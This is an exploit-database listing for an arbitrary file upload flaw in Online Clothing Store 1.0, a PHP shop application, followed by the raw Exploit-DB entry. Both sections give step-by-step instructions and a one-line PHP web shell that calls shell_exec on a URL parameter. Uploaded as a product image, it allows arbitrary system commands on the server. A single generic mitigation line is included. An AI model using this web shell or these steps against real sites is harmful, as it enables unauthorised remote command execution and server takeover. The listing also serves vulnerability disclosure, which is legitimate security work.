header-logo
Suggest Exploit
vendor:
Online Clothing Store
by:
Sushant Kamble and Saurav Shukla
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Online Clothing Store
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_clothing_store:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
2020

Online Clothing Store 1.0 – Arbitrary File Upload

Open Products.php and select any product. Fill details. Create php shell code with below script <?php echo shell_exec($_GET['e'].' 2>&1'); ?>. Click on upload Image. Select php file. Click Submet. Access below URL: http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir. Add system commands after e to execute it.

Mitigation:

Restrict file uploads to only trusted file types and validate the file content. Implement a whitelist of accepted file types and reject all other files.
Source

Exploit-DB raw data:

# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
# Date: 2020-05-05
# Exploit Author: Sushant Kamble and Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4


#Vulnerable Page: Products.php

#Exploit
	Open Products.php and select any product
	Fill details
	Create php shell code with below script
		<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
	Click on upload Image
	Select php file
	Click Submet
	Access below URL:
		http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
	add system commands after e to execute it.